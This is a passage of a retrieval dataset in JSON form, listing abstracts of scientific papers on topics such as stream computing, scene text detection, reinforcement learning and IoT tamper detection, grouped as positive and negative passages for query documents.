"text": "As a new trend for data-intensive computing, real-time stream computing is gaining significant attention in the big data era. In theory, stream computing is an effective way to support big data by providing extremely low-latency processing tools and massively parallel processing architectures in real-time data analysis. However, in most existing stream computing environments, how to efficiently deal with big data stream computing, and how to build efficient big data stream computing systems are posing great challenges to big data computing research. First, the data stream graphs and the system architecture for big data stream computing, and some related key technologies, such as system structure, data transmission, application interfaces, and high availability, are systemically researched. Then, we give a classification of the latest research and depict the development status of some popular big data stream computing systems, including Twitter Storm, Yahoo! S4, Microsoft TimeStream, and Microsoft Naiad. Finally, the potential challenges and future directions of big data stream computing are discussed. 11.",
"title": ""
},
{
"docid": "a7d02aee0ef3730504adefc2d8c05c49",
"text": "We tackle the challenge of reliably and automatically localizing pedestrians in real-life conditions through overhead depth imaging at unprecedented high-density conditions. Leveraging upon a combination of Histogram of Oriented Gradients-like feature descriptors, neural networks, data augmentation and custom data annotation strategies, this work contributes a robust and scalable machine learning-based localization algorithm, which delivers near-human localization performance in real-time, even with local pedestrian density of about 3 ped/m2, a case in which most stateof-the art algorithms degrade significantly in performance.",
"title": ""
},
{
"docid": "b754b1d245aa68aeeb37cf78cf54682f",
"text": "This paper postulates that water structure is altered by biomolecules as well as by disease-enabling entities such as certain solvated ions, and in turn water dynamics and structure affect the function of biomolecular interactions. Although the structural and dynamical alterations are subtle, they perturb a well-balanced system sufficiently to facilitate disease. We propose that the disruption of water dynamics between and within cells underlies many disease conditions. We survey recent advances in magnetobiology, nanobiology, and colloid and interface science that point compellingly to the crucial role played by the unique physical properties of quantum coherent nanomolecular clusters of magnetized water in enabling life at the cellular level by solving the “problems” of thermal diffusion, intracellular crowding, and molecular self-assembly. Interphase water and cellular surface tension, normally maintained by biological sulfates at membrane surfaces, are compromised by exogenous interfacial water stressors such as cationic aluminum, with consequences that include greater local water hydrophobicity, increased water tension, and interphase stretching. The ultimate result is greater “stiffness” in the extracellular matrix and either the “soft” cancerous state or the “soft” neurodegenerative state within cells. Our hypothesis provides a basis for understanding why so many idiopathic diseases of today are highly stereotyped and pluricausal. OPEN ACCESS Entropy 2013, 15 3823",
"title": ""
},
{
"docid": "17db752bfc7ce75ded5b3836c5ae3dd7",
"text": "Knowledge-based question answering relies on the availability of facts, the majority of which cannot be found in structured sources (e.g. Wikipedia info-boxes, Wikidata). One of the major components of extracting facts from unstructured text is Relation Extraction (RE). In this paper we propose a novel method for creating distant (weak) supervision labels for training a large-scale RE system. We also provide new evidence about the effectiveness of neural network approaches by decoupling the model architecture from the feature design of a state-of-the-art neural network system. Surprisingly, a much simpler classifier trained on similar features performs on par with the highly complex neural network system (at 75x reduction to the training time), suggesting that the features are a bigger contributor to the final performance.",
"title": ""
},
{
"docid": "f4e8b75ce3149566edec9eb1f248c226",
"text": "Knowledge Management software is software that integrates. Existing Data sources, process flows, application features from office appliances have to be brought together. There are different standards, consisting of data formats and communication protocols, that address this issue. The WWW and Semantic Web are designed to work on a worldwide scale and define those standards. We transfer the web standards to the desktop szenario, a vision we call Semantic Desktop – a Semantic Web enhanced desktop environment. Central is the idea of taking know-how from the Semantic Web to tackle personal information management. Existing desktop applications (email client, browser, office applications) are integrated, the semantic glue between them expressed using ontologies. We also present the www.gnowsis.org open source project by the DFKI that realizes parts of this vision. It is based on a Semantic Web Server running as desktop service. It was used in experiments and research projects and allows others to experiment. Knowledge management applications can be built on top of it, reducing the implementation cost. 1",
"title": ""
},
{
"docid": "d318fa3ea2d612db3ba3b7dd56e40906",
"text": "Super-resolution microscopy (SRM) is becoming increasingly important to study nanoscale biological structures. Two most widely used devices for SRM are super-resolution fluorescence microscopy (SRFM) and electron microscopy (EM). For biological living samples, however, SRFM is not preferred since it requires exogenous agents and EM is not preferred since vacuum is required for sample preparation. To overcome these limitations of EM and SFRM, we present a simulation study of super-resolution photoacoustic microscopy (SR-PAM). To break the diffraction limit of light, we investigated a sub-10 nm near-field localization by focusing femtosecond laser pulses under the plasmonic nanoaperture. Using this near-field localization as a light source, we numerically studied the feasibility of the SR-PAM with a k-wave simulation toolbox in MATLAB. In this photoacoustic simulation, we successfully confirmed that the SR-PAM could be a potential method to resolve and image nanoscale structures.",
"title": ""
},
{
"docid": "54b60f333ba4e58f2f1f2614e54b50a8",
"text": "Personalize PageRank (PPR) is an effective relevance (proximity) measure in graph mining. The goal of this paper is to efficiently compute single node relevance and top-k/highly relevant nodes without iteratively computing the relevances of all nodes. Based on a \"random surfer model\", PPR iteratively computes the relevances of all nodes in a graph until convergence for a given user preference distribution. The problem with this iterative approach is that it cannot compute the relevance of just one or a few nodes. The heart of our solution is to compute single node relevance accurately in non-iterative manner based on sparse matrix representation, and to compute top-k/highly relevant nodes exactly by pruning unnecessary relevance computations based on upper/lower relevance estimations. Our experiments show that our approach is up to seven orders of magnitude faster than the existing alternatives.",
"title": ""
},
{
"docid": "ecb06a681f7d14fc690376b4c5a630af",
"text": "Diverse proprietary network appliances increase both the capital and operational expense of service providers, meanwhile causing problems of network ossification. Network function virtualization (NFV) is proposed to address these issues by implementing network functions as pure software on commodity and general hardware. NFV allows flexible provisioning, deployment, and centralized management of virtual network functions. Integrated with SDN, the software-defined NFV architecture further offers agile traffic steering and joint optimization of network functions and resources. This architecture benefits a wide range of applications (e.g., service chaining) and is becoming the dominant form of NFV. In this survey, we present a thorough investigation of the development of NFV under the software-defined NFV architecture, with an emphasis on service chaining as its application. We first introduce the software-defined NFV architecture as the state of the art of NFV and present relationships between NFV and SDN. Then, we provide a historic view of the involvement from middlebox to NFV. Finally, we introduce significant challenges and relevant solutions of NFV, and discuss its future research directions by different application domains.",
"title": ""
},
{
"docid": "711ca6f01ed407e1026dd9958ae94cb2",
"text": "The Internet of Things (IoT) is increasingly used for critical applications and securing the IoT has become a major concern. Among other issues it is important to ensure that tampering with IoT devices is detected. Many IoT devices use WiFi for communication and Channel State Information (CSI) based tamper detection is a valid option. Each 802.11n WiFi frame contains a preamble which allows a receiver to estimate the impact of the wireless channel, the transmitter and the receiver on the signal. The estimation result - the CSI - is used by a receiver to extract the transmitted information. However, as the CSI depends on the communication environment and the transmitter hardware, it can be used as well for security purposes. If an attacker tampers with a transmitter it will have an effect on the CSI measured at a receiver. Unfortunately not only tamper events lead to CSI fluctuations; movement of people in the communication environment has an impact too. We propose to analyse CSI values of a transmission simultaneously at multiple receivers to improve distinction of tamper and movement events. A moving person is expected to have an impact on some but not all communication links between transmitter and the receivers. A tamper event impacts on all links between transmitter and the receivers. The paper describes the necessary algorithms for the proposed tamper detection method. In particular we analyse the tamper detection capability in practical deployments with varying intensity of people movement. In our experiments the proposed system deployed in a busy office environment was capable to detect 53% of tamper events (TPR = 53%) while creating zero false alarms (FPR = 0%).",
"title": ""
},
{
"docid": "757cf49ed451205b6f710953e835dfc6",
"text": "We consider the problem of event-related desynchronization (ERD) estimation. In existing approaches, model parameters are usually found manually through experimentation, a tedious task that often leads to suboptimal estimates. We propose an expectation-maximization (EM) algorithm for model parameter estimation that is fully automatic and gives optimal estimates. Further, we apply a Kalman smoother to obtain ERD estimates. Results show that the EM algorithm significantly improves the performance of the Kalman smoother. Application of the proposed approach to the motor-imagery EEG data shows that useful ERD patterns can be obtained even without careful selection of frequency bands.",
"title": ""
},
{
"docid": "e3913c904630d23b7133978a1116bc57",
"text": "A novel self-substrate-triggered (SST) technique is proposed to solve the nonuniform turn-on issue of the multi-finger GGNMOS for ESD protection. The first turned-on center finger is used to trigger on all fingers in the GGNMOS structure with self-substrate-triggered technique. So, the turn-on uniformity and ESD robustness of GGNMOS can be greatly improved by the new proposed self-substrate-triggered technique.",
"title": ""
},
{
"docid": "2dcfb5cbc80c05698ad717b1043b1484",
"text": "A new control method using a hysteretic PWM controller for all types of converters and its proper design method are presented. The triangular voltage obtained from a simple RC network connected between comparator output and converter output is superimposed to the output voltage and as a feedback signal to a hysteretic comparator. Since the hysteretic PWM controller essentially has derivative characteristics and has no error amplifier, the presented method provides no steady-state error voltage on the output and excellent dynamic performances for the load current transient by choosing proper values of time constants in the RC network. Performances of the proposed controller are experimentally verified for the buck, buck-boost and boost converters.",
"title": ""
},
{
"docid": "71b5708fb9d078b370689cac22a66013",
"text": "This paper presents a model, synthesized from the literature, of factors that explain how business analytics contributes to business value. It also reports results from a preliminary test of that model. The model consists of two parts: a process and a variance model. The process model depicts the analyze-insight-decision-action process through which use of an organization’s business-analytic capabilities create business value. The variance model proposes that the five factors in Davenport et al.’s (2010) DELTA model of BA success factors, six from Watson and Wixom (2007), and three from Seddon et al.’s (2010) model of organizational benefits from enterprise systems, assist a firm to gain business value from business analytics. A preliminary test of the model was conducted using data from 100 customer-success stories from vendors such as IBM, SAP, and Teradata. Our conclusion is that the model is likely to be a useful basis for future research.",
"title": ""
},
{
"docid": "d9a23e088330f7564c14093b4ceabbec",
"text": "One of the most contested questions in the social sciences is whether people behave rationally. A large body of work assumes that individuals do in fact make rational economic, political, and social decisions. Yet hundreds of experiments suggest that this is not the case. Framing effects constitute one of the most stunning and influential demonstrations of irrationality. The effects not only challenge the foundational assumptions of much of the social sciences (e.g., the existence of coherent preferences or stable attitudes), but also lead many scholars to adopt alternative approaches (e.g., prospect theory). Surprisingly, virtually no work has sought to specify the political conditions under which framing effects occur. I fill this gap by offering a theory and experimental test. I show how contextual forces (e.g., elite competition, deliberation) and individual attributes (e.g., expertise) affect the success of framing. The results provide insight into when rationality assumptions apply and, also, have broad implications for political psychology and experimental methods.",
"title": ""
},
{
"docid": "659ba70d9d0d17e5d1b708cb5c61be2c",
"text": "It has been hypothesized that there is a critical period for first-language acquisition that extends into late childhood and possibly until puberty. The hypothesis is difficult to test directly because cases of linguistic deprivation during childhood are fortunately rare. We present here the case of E.M., a young man who has been profoundly deaf since birth and grew up in a rural area where he received no formal education and had no contact with the deaf community. At the age of 15, E.M. was fitted with hearing aids that corrected his hearing loss to 35 dB, and he began to learn verbal Spanish. We describe his language development over the 4-year period since his acquisition of hearing aids and conclude that the demonstrates severe deficits in verbal comprehension and production that support the critical period hypothesis.",
"title": ""
},
{
"docid": "7f0a2510e2f9d23fe5058bf5fa826b59",
"text": "This paper presents the progress of acoustic models for lowresourced languages (Assamese, Bengali, Haitian Creole, Lao, Zulu) developed within the second evaluation campaign of the IARPA Babel project. This year, the main focus of the project is put on training high-performing automatic speech recognition (ASR) and keyword search (KWS) systems from language resources limited to about 10 hours of transcribed speech data. Optimizing the structure of Multilayer Perceptron (MLP) based feature extraction and switching from the sigmoid activation function to rectified linear units results in about 5% relative improvement over baseline MLP features. Further improvements are obtained when the MLPs are trained on multiple feature streams and by exploiting label preserving data augmentation techniques like vocal tract length perturbation. Systematic application of these methods allows to improve the unilingual systems by 4-6% absolute in WER and 0.064-0.105 absolute in MTWV. Transfer and adaptation of multilingually trained MLPs lead to additional gains, clearly exceeding the project goal of 0.3 MTWV even when only the limited language pack of the target language is used.",
"title": ""
},
{
"docid": "d59a63413ad3ca838178fc399fd6b0f3",
"text": "In this study a mission data base based clustering approach that can be used in radar warning receivers for the purpose of deinterleaving is suggested. Cell based deinterleaving technique, which is widely used at the present time, utilizes the information of direction of arrival, frequency and pulse width. In this study, different from this approach used in the literature, frequency, direction of arrival and pulse amplitude parameters are utilized for deinterleaving. With this technique it is shown that accurate results can be obtained by simulation.",
"title": ""
}
] | scidocsrr |
ad65c4c7f9538ac58cf2af74a7d70183 | ARCHER: Aggressive Rewards to Counter bias in Hindsight Experience Replay | [
{
"docid": "b8b3c053c95fbc3cb211ff4c9a4ced03",
"text": "We propose Scheduled Auxiliary Control (SACX), a new learning paradigm in the context of Reinforcement Learning (RL). SAC-X enables learning of complex behaviors – from scratch – in the presence of multiple sparse reward signals. To this end, the agent is equipped with a set of general auxiliary tasks, that it attempts to learn simultaneously via off-policy RL. The key idea behind our method is that active (learned) scheduling and execution of auxiliary policies allows the agent to efficiently explore its environment – enabling it to excel at sparse reward RL. Our experiments in several challenging robotic manipulation settings demonstrate the power of our approach. A video of the rich set of learned behaviours can be found at https://youtu.be/mPKyvocNe M.",
"title": ""
},
{
"docid": "73977bfb83e82862445f0c114a0ba722",
"text": "Current machine learning systems operate, almost exclusively, in a statistical, or model-blind mode, which entails severe theoretical limits on their power and performance. Such systems cannot reason about interventions and retrospection and, therefore, cannot serve as the basis for strong AI. To achieve human level intelligence, learning machines need the guidance of a model of reality, similar to the ones used in causal inference. To demonstrate the essential role of such models, I will present a summary of seven tasks which are beyond reach of current machine learning systems and which have been accomplished using the tools of causal inference.",
"title": ""
}
] | [
{
"docid": "f6211f28785ac28d8ff91459fe81a6f7",
"text": "We describe a novel approach to the measurement of discounting based on calculating the area under the empirical discounting function. This approach avoids some of the problems associated with measures based on estimates of the parameters of theoretical discounting functions. The area measure may be easily calculated for both individual and group data collected using any of a variety of current delay and probability discounting procedures. The present approach is not intended as a substitute for theoretical discounting models. It is useful, however, to have a simple, univariate measure of discounting that is not tied to any specific theoretical framework.",
"title": ""
},
{
"docid": "57897a9c927743037dab98a1538a1563",
"text": "Affective lexicons are a useful tool for emotion studies as well as for opinion mining and sentiment analysis. Such lexicons contain lists of words annotated with their emotional assessments. There exist a number of affective lexicons for English, Spanish, German and other languages. However, only a few of such resources are available for French. A lot of human efforts are needed to build and extend an affective lexicon. In our research, we propose to use Twitter, the most popular microblogging platform nowadays, to collect a dataset of emotional texts in French. Using the collected dataset, we estimated affective norms of words to construct an affective lexicon, which we use for polarity classification of video game reviews. Experimental results show that our method performs comparably to classic supervised learning methods.",
"title": ""
},
{
"docid": "51bd82a4393105ed63a188b2dd54956b",
"text": "Although perceived continuity with one's future self has attracted increasing research interest, age differences in this phenomenon remain poorly understood. The present study is the first to simultaneously examine past and future self-continuity across multiple temporal distances using both explicit and implicit measures and controlling for a range of theoretically implicated covariates in an adult life span sample (N = 91, aged 18-92, M = 50.15, SD = 19.20, 56% female). Perceived similarity to one's self across 6 past and 6 future time points (1 month to 10 years) was assessed with an explicit self-report measure and an implicit me/not me trait rating task. In multilevel analyses, age was significantly associated with greater implicit and explicit self-continuity, especially for more distant intervals. Further, reaction times (RTs) in the implicit task remained stable with temporal distance for older adults but decreased with temporal distance for younger adults, especially for future ratings. This points toward age differences in the underlying mechanisms of self-continuity. Multilevel models examined the role of various covariates including personality, cognition, future horizons, and subjective health and found that none of them could fully account for the observed age effects. Taken together, our findings suggest that chronological age is associated with greater self-continuity although specific mechanisms and correlates may vary by age. (PsycINFO Database Record",
"title": ""
},
{
"docid": "700ee7aa274175cbfdd26ad12f210cdc",
"text": "Differing characteristics of local environments, both infrastructural and socio-economic, have created a significant level of variation in the acceptance and growth of e-commerce in different regions of the world. Our findings show that, in development and diffusion of ecommerce in China, cultural issues such as “socializing effect of commerce”, “transactional and institutional trust”, and “attitudes toward debt” play a very major role. In this paper, we present and discuss these findings, and identify changes that will be required for broader acceptance and diffusion of e-commerce in China and propose approaches that businesses can use to enhance this development.",
"title": ""
},
{
"docid": "989c0cba84b496a9a6801f34a7f7636d",
"text": "The profusion of user generated content caused by the rise of social media platforms has enabled a surge in research relating to fields such as information retrieval, recommender systems, data mining and machine learning. However, the lack of comprehensive baseline data sets to allow a thorough evaluative comparison has become an important issue. In this paper we present a large data set of news items from well-known aggregators such as Google News and Yahoo! News, and their respective social feedback on multiple platforms: Facebook, Google+ and LinkedIn. The data collected relates to a period of 8 months, between November 2015 and July 2016, accounting for about 100,000 news items on four different topics: economy, microsoft, obama and palestine. This data set is tailored for evaluative comparisons in predictive analytics tasks, although allowing for tasks in other research areas such as topic detection and tracking, sentiment analysis in short text, first story detection or news recommendation..",
"title": ""
},
{
"docid": "aa74bb5c6dbb758e0a68e10b1f35f3c9",
"text": "College students differ in their approaches to challenging course assignments. While some prefer to begin their assignments early, others postpone their work until the last minute. The present study adds to the procrastination literature by examining the links among self-compassionate attitudes, motivation, and procrastination tendency. A sample of college undergraduates completed four online surveys. Individuals with low, moderate, and high levels of self-compassion were compared on measures of motivation anxiety, achievement goal orientation, and procrastination tendency. Data analyses revealed that individuals with high self-compassion reported dramatically less motivation anxiety and procrastination tendency than those with low or moderate self-compassion. The practical importance of studying self-views as potential triggers for procrastination behavior and directions for future research are discussed.",
"title": ""
},
{
"docid": "246bbb92bc968d20866b8c92a10f8ac7",
"text": "This survey paper provides an overview of content-based music information retrieval systems, both for audio and for symbolic music notation. Matching algorithms and indexing methods are briefly presented. The need for a TREC-like comparison of matching algorithms such as MIREX at ISMIR becomes clear from the high number of quite different methods which so far only have been used on different data collections. We placed the systems on a map showing the tasks and users for which they are suitable, and we find that existing content-based retrieval systems fail to cover a gap between the very general and the very specific retrieval tasks.",
"title": ""
},
{
"docid": "6f3ec6136c57bcd00ba810c9af7493d6",
"text": "In this article, we summarize some of the recent advancements in assistive technologies that are designed for people with visual impairments (VI) and blind people. Present technology enables applications to be actively disseminated and to efficiently operate on handheld mobile devices. These applications include also those that require high computational requirements. As a consequent, digital travel aids, visual sensing modules, text-to-speech applications, navigational assistance tools, and the combination with diverse assistive haptic devices are becoming consolidated with typical mobile devices. This direction has opened diversity of new perspectives for practical training and rehabilitation of people with VI. The aim of this article is to give an overview about the recent developments of assistive applications designed for people with VI. In conclusion, we recommend designing a unified robust system for people with VI which provides the support of the different kind of services.",
"title": ""
},
{
"docid": "2d3e779b25d0ffe8a97744be370125fa",
"text": "This paper describes the details of Sighthound’s fully automated age, gender and emotion recognition system. The backbone of our system consists of several deep convolutional neural networks that are not only computationally inexpensive, but also provide state-of-theart results on several competitive benchmarks. To power our novel deep networks, we collected large labeled datasets through a semi-supervised pipeline to reduce the annotation effort/time. We tested our system on several public benchmarks and report outstanding results. Our age, gender and emotion recognition models are available to developers through the Sighthound Cloud API at https://www.sighthound.com/products/cloud",
"title": ""
},
{
"docid": "eaec7fb5490ccabd52ef7b4b5abd25f6",
"text": "Automatic and reliable segmentation of the prostate is an important but difficult task for various clinical applications such as prostate cancer radiotherapy. The main challenges for accurate MR prostate localization lie in two aspects: (1) inhomogeneous and inconsistent appearance around prostate boundary, and (2) the large shape variation across different patients. To tackle these two problems, we propose a new deformable MR prostate segmentation method by unifying deep feature learning with the sparse patch matching. First, instead of directly using handcrafted features, we propose to learn the latent feature representation from prostate MR images by the stacked sparse auto-encoder (SSAE). Since the deep learning algorithm learns the feature hierarchy from the data, the learned features are often more concise and effective than the handcrafted features in describing the underlying data. To improve the discriminability of learned features, we further refine the feature representation in a supervised fashion. Second, based on the learned features, a sparse patch matching method is proposed to infer a prostate likelihood map by transferring the prostate labels from multiple atlases to the new prostate MR image. Finally, a deformable segmentation is used to integrate a sparse shape model with the prostate likelihood map for achieving the final segmentation. The proposed method has been extensively evaluated on the dataset that contains 66 T2-wighted prostate MR images. Experimental results show that the deep-learned features are more effective than the handcrafted features in guiding MR prostate segmentation. Moreover, our method shows superior performance than other state-of-the-art segmentation methods.",
"title": ""
},
{
"docid": "ddfc7c8b86ceb96935f0567e7cfb79f8",
"text": "This Short Review critically evaluates three hypotheses about the effects of emotion on memory: First, emotion usually enhances memory. Second, when emotion does not enhance memory, this can be understood by the magnitude of physiological arousal elicited, with arousal benefiting memory to a point but then having a detrimental influence. Third, when emotion facilitates the processing of information, this also facilitates the retention of that same information. For each of these hypotheses, we summarize the evidence consistent with it, present counter-evidence suggesting boundary conditions for the effect, and discuss the implications for future research.",
"title": ""
},
{
"docid": "102e1718e03b3a4e96ee8c2212738792",
"text": "This paper introduces a new method for the rapid development of complex rule bases involving cue phrases for the purpose of classifying text segments. The method is based on Ripple-Down Rules, a knowledge acquisition method that proved very successful in practice for building medical expert systems and does not require a knowledge engineer. We implemented our system KAFTAN and demonstrate the applicability of our method to the task of classifying scientific citations. Building cue phrase rules in KAFTAN is easy and efficient. We demonstrate the effectiveness of our approach by presenting experimental results where our resulting classifier clearly outperforms previously built classifiers in the recent literature.",
"title": ""
},
{
"docid": "2176e4119a16409154ae3d8f5d74c901",
"text": "The so-called Internet of Things (IoT) has attracted increasing attention in the field of computer and information science. In this paper, a specific application of IoT, named Safety Management System for Tower Crane Groups (SMS-TC), is proposed for use in the construction industry field. The operating status of each tower crane was detected by a set of customized sensors, including horizontal and vertical position sensors for the trolley, angle sensors for the jib and load, tilt and wind speed sensors for the tower body. The sensor data is collected and processed by the Tower Crane Safety Terminal Equipment (TC-STE) installed in the driver's operating room. Wireless communication between each TC-STE and the Local Monitoring Terminal (LMT) at the ground worksite were fulfilled through a Zigbee wireless network. LMT can share the status information of the whole group with each TC-STE, while the LMT records the real-time data and reports it to the Remote Supervision Platform (RSP) through General Packet Radio Service (GPRS). Based on the global status data of the whole group, an anti-collision algorithm was executed in each TC-STE to ensure the safety of each tower crane during construction. Remote supervision can be fulfilled using our client software installed on a personal computer (PC) or smartphone. SMS-TC could be considered as a promising practical application that combines a Wireless Sensor Network with the Internet of Things.",
"title": ""
},
{
"docid": "c1ddf32bfa71f32e51daf31e077a87cd",
"text": "There is a step of significant difficulty experienced by brain-computer interface (BCI) users when going from the calibration recording to the feedback application. This effect has been previously studied and a supervised adaptation solution has been proposed. In this paper, we suggest a simple unsupervised adaptation method of the linear discriminant analysis (LDA) classifier that effectively solves this problem by counteracting the harmful effect of nonclass-related nonstationarities in electroencephalography (EEG) during BCI sessions performed with motor imagery tasks. For this, we first introduce three types of adaptation procedures and investigate them in an offline study with 19 datasets. Then, we select one of the proposed methods and analyze it further. The chosen classifier is offline tested in data from 80 healthy users and four high spinal cord injury patients. Finally, for the first time in BCI literature, we apply this unsupervised classifier in online experiments. Additionally, we show that its performance is significantly better than the state-of-the-art supervised approach.",
"title": ""
},
{
"docid": "9c507a2b1f57750d1b4ffeed6979a06f",
"text": "Once considered provocative, the notion that the wisdom of the crowd is superior to any individual has become itself a piece of crowd wisdom, leading to speculation that online voting may soon put credentialed experts out of business. Recent applications include political and economic forecasting, evaluating nuclear safety, public policy, the quality of chemical probes, and possible responses to a restless volcano. Algorithms for extracting wisdom from the crowd are typically based on a democratic voting procedure. They are simple to apply and preserve the independence of personal judgment. However, democratic methods have serious limitations. They are biased for shallow, lowest common denominator information, at the expense of novel or specialized knowledge that is not widely shared. Adjustments based on measuring confidence do not solve this problem reliably. Here we propose the following alternative to a democratic vote: select the answer that is more popular than people predict. We show that this principle yields the best answer under reasonable assumptions about voter behaviour, while the standard ‘most popular’ or ‘most confident’ principles fail under exactly those same assumptions. Like traditional voting, the principle accepts unique problems, such as panel decisions about scientific or artistic merit, and legal or historical disputes. The potential application domain is thus broader than that covered by machine learning and psychometric methods, which require data across multiple questions.",
"title": ""
},
{
"docid": "53f7958f77563b9dfaeedf38099cedf2",
"text": "The availability of new techniques and tools for Video Surveillance and the capability of storing huge amounts of visual data acquired by hundreds of cameras every day call for a convergence between pattern recognition, computer vision and multimedia paradigms. A clear need for this convergence is shown by new research projects which attempt to exploit both ontology-based retrieval and video analysis techniques also in the field of surveillance. This paper presents the ViSOR (Video Surveillance Online Repository) framework, designed with the aim of establishing an open platform for collecting, annotating, retrieving, and sharing surveillance videos, as well as evaluating the performance of automatic surveillance systems. Annotations are based on a reference ontology which has been defined integrating hundreds of concepts, some of them coming from the LSCOM and MediaMill ontologies. A new annotation classification schema is also provided, which is aimed at identifying the spatial, temporal and domain detail level used. The ViSOR web interface allows video browsing, querying by annotated concepts or by keywords, compressed video previewing, media downloading and uploading. Finally, ViSOR includes a performance evaluation desk which can be used to compare different annotations.",
"title": ""
},
{
"docid": "9a42785b743ed0b38334819365977020",
"text": "Low-cost but high-performance robot arms are required for widespread use of service robots. Most robot arms use expensive motors and speed reducers to provide torques sufficient to support the robot mass and payload. If the gravitational torques due to the robot mass, which is usually much greater than the payload, can be compensated for by some means; the robot would need much smaller torques, which can be delivered by cheap actuator modules. To this end, we propose a novel counterbalance mechanism which can completely counterbalance the gravitational torques due to the robot mass. Since most 6-DOF robots have three pitch joints, which are subject to gravitational torques, we propose a 3-DOF counterbalance mechanism based on the double parallelogram mechanism, in which reference planes are provided to each joint for proper counterbalancing. A 5-DOF counterbalance robot arm was built to demonstrate the performance of the proposed mechanism. Simulation and experimental results showed that the proposed mechanism had effectively decreased the torque required to support the robot mass, thus allowing the prospective use of low-cost motors and speed reducers for high-performance robot arms.",
"title": ""
},
{
"docid": "59cf9407986097ac31214c0289d6f8a2",
"text": "Model selection is a core aspect in machine learning and is, occasionally, multi-objective in nature. For instance, hyper-parameter selection in a multi-task learning context is of multi-objective nature, since all the tasks' objectives must be optimized simultaneously. In this paper, a novel multi-objective racing algorithm (RA), namely S-Race, is put forward. Given an ensemble of models, our task is to reliably identify Pareto optimal models evaluated against multiple objectives, while minimizing the total computational cost. As a RA, S-Race attempts to eliminate non-promising models with confidence as early as possible, so as to concentrate computational resources on promising ones. Simultaneously, it addresses the problem of multi-objective model selection (MOMS) in the sense of Pareto optimality. In S-Race, the nonparametric sign test is utilized for pair-wise dominance relationship identification. Moreover, a discrete Holm's step-down procedure is adopted to control the family-wise error rate of the set of hypotheses made simultaneously. The significance level assigned to each family is adjusted adaptively during the race. In order to illustrate its merits, S-Race is applied on three MOMS problems: (1) selecting support vector machines for classification; (2) tuning the parameters of artificial bee colony algorithms for numerical optimization; and (3) constructing optimal hybrid recommendation systems for movie recommendation. The experimental results confirm that S-Race is an efficient and effective MOMS algorithm compared to a brute-force approach.",
"title": ""
},
{
"docid": "587f58f291732bfb8954e34564ba76fd",
"text": "Blood pressure oscillometric waveforms behave as amplitude modulated nonlinear signals with frequency fluctuations. Their oscillating nature can be better analyzed by the digital Taylor-Fourier transform (DTFT), recently proposed for phasor estimation in oscillating power systems. Based on a relaxed signal model that includes Taylor components greater than zero, the DTFT is able to estimate not only the oscillation itself, as does the digital Fourier transform (DFT), but also its derivatives included in the signal model. In this paper, an oscillometric waveform is analyzed with the DTFT, and its zeroth and first oscillating harmonics are illustrated. The results show that the breathing activity can be separated from the cardiac one through the critical points of the first component, determined by the zero crossings of the amplitude derivatives estimated from the third Taylor order model. On the other hand, phase derivative estimates provide the fluctuations of the cardiac frequency and its derivative, new parameters that could improve the precision of the systolic and diastolic blood pressure assignment. The DTFT envelope estimates uniformly converge from K=3, substantially improving the harmonic separation of the DFT.",
"title": ""
},
{
"docid": "b27d6f04073e381d69e958f536586a11",
"text": "The idea of robotic companions capable of establishing meaningful relationships with humans remains far from being accomplished. To achieve this, robots must interact with people in natural ways, employing social mechanisms that people use while interacting with each other. One such mechanism is empathy, often seen as the basis of social cooperation and prosocial behaviour. We argue that artificial companions capable of behaving in an empathic manner, which involves the capacity to recognise another’s affect and respond appropriately, are more successful at establishing and maintaining a positive relationship with users. This paper presents a study where an autonomous robot with empathic capabilities acts as a social companion to two players in a chess game. The robot reacts to the moves played on the chessboard by displaying several facial expressions and verbal utterances, showing empathic behaviours towards one player and behaving neutrally towards the other. Quantitative and qualitative results of 31 participants indicate that users towards whom the robot behaved empathically perceived the robot as friendlier, which supports our hypothesis that empathy plays a key role in human-robot interaction.",
"title": ""
}
] | scidocsrr |
44a4f3fac83a118baa985b56a2522b27 | R2 CNN: Rotational Region CNN for Arbitrarily-Oriented Scene Text Detection | [
{
"docid": "ead5432cb390756a99e4602a9b6266bf",
"text": "In this paper, we present a new approach for text localization in natural images, by discriminating text and non-text regions at three levels: pixel, component and text line levels. Firstly, a powerful low-level filter called the Stroke Feature Transform (SFT) is proposed, which extends the widely-used Stroke Width Transform (SWT) by incorporating color cues of text pixels, leading to significantly enhanced performance on inter-component separation and intra-component connection. Secondly, based on the output of SFT, we apply two classifiers, a text component classifier and a text-line classifier, sequentially to extract text regions, eliminating the heuristic procedures that are commonly used in previous approaches. The two classifiers are built upon two novel Text Covariance Descriptors (TCDs) that encode both the heuristic properties and the statistical characteristics of text stokes. Finally, text regions are located by simply thresholding the text-line confident map. Our method was evaluated on two benchmark datasets: ICDAR 2005 and ICDAR 2011, and the corresponding F-measure values are 0.72 and 0.73, respectively, surpassing previous methods in accuracy by a large margin.",
"title": ""
},
{
"docid": "c551575e68a8061461dc6c78b76a0386",
"text": "Recently, scene text detection has become an active research topic in computer vision and document analysis, because of its great importance and significant challenge. However, vast majority of the existing methods detect text within local regions, typically through extracting character, word or line level candidates followed by candidate aggregation and false positive elimination, which potentially exclude the effect of wide-scope and long-range contextual cues in the scene. To take full advantage of the rich information available in the whole natural image, we propose to localize text in a holistic manner, by casting scene text detection as a semantic segmentation problem. The proposed algorithm directly runs on full images and produces global, pixel-wise prediction maps, in which detections are subsequently formed. To better make use of the properties of text, three types of information regarding text region, individual characters and their relationship are estimated, with a single Fully Convolutional Network (FCN) model. With such predictions of text properties, the proposed algorithm can simultaneously handle horizontal, multi-oriented and curved text in real-world natural images. The experiments on standard benchmarks, including ICDAR 2013, ICDAR 2015 and MSRA-TD500, demonstrate that the proposed algorithm substantially outperforms previous state-ofthe-art approaches. Moreover, we report the first baseline result on the recently-released, large-scale dataset COCO-Text. Keywords—Scene text detection, fully convolutional network, holistic prediction, natural images.",
"title": ""
},
{
"docid": "2ff3238a25fd7055517a2596e5e0cd7c",
"text": "Previous approaches for scene text detection have already achieved promising performances across various benchmarks. However, they usually fall short when dealing with challenging scenarios, even when equipped with deep neural network models, because the overall performance is determined by the interplay of multiple stages and components in the pipelines. In this work, we propose a simple yet powerful pipeline that yields fast and accurate text detection in natural scenes. The pipeline directly predicts words or text lines of arbitrary orientations and quadrilateral shapes in full images, eliminating unnecessary intermediate steps (e.g., candidate aggregation and word partitioning), with a single neural network. The simplicity of our pipeline allows concentrating efforts on designing loss functions and neural network architecture. Experiments on standard datasets including ICDAR 2015, COCO-Text and MSRA-TD500 demonstrate that the proposed algorithm significantly outperforms state-of-the-art methods in terms of both accuracy and efficiency. On the ICDAR 2015 dataset, the proposed algorithm achieves an F-score of 0.7820 at 13.2fps at 720p resolution.",
"title": ""
}
